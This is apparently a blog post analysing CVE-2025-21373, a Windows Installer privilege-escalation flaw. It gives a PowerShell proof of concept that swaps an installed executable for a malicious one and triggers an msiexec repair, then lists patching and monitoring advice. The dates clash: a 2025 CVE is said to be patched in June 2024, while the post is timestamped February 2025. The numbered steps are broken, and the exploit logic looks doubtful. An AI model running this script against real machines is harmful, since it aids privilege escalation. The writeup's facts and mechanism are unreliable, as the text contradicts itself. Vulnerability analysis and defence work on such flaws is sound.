CVE-2025-21373 - Windows Installer Elevation of Privilege Vulnerability - Complete Analysis and Exploit Details

On June 11th, 2024, Microsoft released a security update addressing a new vulnerability in the core Windows Installer component. Tracked as CVE-2025-21373, this flaw allows attackers to escalate their privileges from a regular user account to SYSTEM, threatening the security of millions of Windows machines worldwide. In this post, we’ll explain how this vulnerability works, how it can be exploited, and what you should do to protect your systems.

What is CVE-2025-21373?

CVE-2025-21373 is listed as a Windows Installer Elevation of Privilege Vulnerability. The Windows Installer (msiexec.exe) is responsible for installing, maintaining, and removing software on Windows. This component runs with high privileges, making it an attractive target to attackers.

Severity: High
CVSS Score: 7.8 (High)
Affected Systems: Windows 10, Windows 11, Windows Server (2016, 2019, 2022)
Official Advisory: Microsoft Security Update Guide

How Does CVE-2025-21373 Work?

This vulnerability exists due to improper handling of repair functionality in Windows Installer. When a user triggers a repair operation on a previously installed MSI package, Windows Installer does not correctly impersonate the caller's privileges. This opens a tiny but dangerous window, where arbitrary code could be injected to run as SYSTEM.

Attacker convinces the user to run a crafted script or program.

3. Script triggers a repair operation on the MSI package, but swaps legitimate files with a malicious payload.

Here's an example of a proof-of-concept PowerShell script demonstrating this vulnerability

# WARNING: FOR EDUCATIONAL PURPOSES ONLY
# Replace 'VulnerableApp.msi' and 'C:\Path\to\malicious.exe' with real paths

# Step 1: Find installed product with repair capability
$ProductCode = '{12345678-1234-1234-1234-123456789ABC}'
$MaliciousExe = 'C:\Path\to\malicious.exe'
$TargetPath = "C:\Program Files\VulnerableApp\legit.exe"

# Step 2: Replace the legitimate file with the malicious one
Copy-Item -Path $MaliciousExe -Destination $TargetPath -Force

# Step 3: Trigger a repair operation
Start-Process msiexec.exe -ArgumentList "/faum $ProductCode /qn" -Wait

# PowerShell ends here

How it works: This script replaces a legitimate program file in the installed application with a malicious executable before initiating a repair. When the repair happens, Windows Installer—running as SYSTEM—will execute the file, escalating the attacker's privilege.

Note: Actual exploitation may vary depending on the targeted MSI and environment.

References and Further Reading

- Microsoft Patch Tuesday June 2024 - CVE-2025-21373
- Windows Installer Documentation
- Security StackExchange: CVE-2025-21373 Discussion
- Mitre CVE Entry

1. Patch Immediately

Make sure your Windows devices are updated with the latest June 2024 Security Updates. Patches are available via Windows Update or through your usual enterprise deployment tools.

2. Limit Local Admin Rights

Avoid giving local admin or unnecessary modify permissions to untrusted users. This reduces the chances of attackers leveraging repair functionality.

3. Monitor for MSI Repairs

Use Windows event logs to monitor unusual MSI repair actions, which can indicate abuse.

Conclusion

CVE-2025-21373 represents a serious security risk, enabling attackers to escalate privileges using native Windows functionality. While Microsoft has issued a patch, the exploit is relatively simple and could be weaponized. Keep your systems updated and watch for any unusual MSI-related activity.

Stay safe, patch regularly, and follow best security practices!

*(This writeup is exclusive to this post. Sharing is encouraged with credit.)*

Timeline

Published on: 02/11/2025 18:15:35 UTC
Last modified on: 03/12/2025 01:42:44 UTC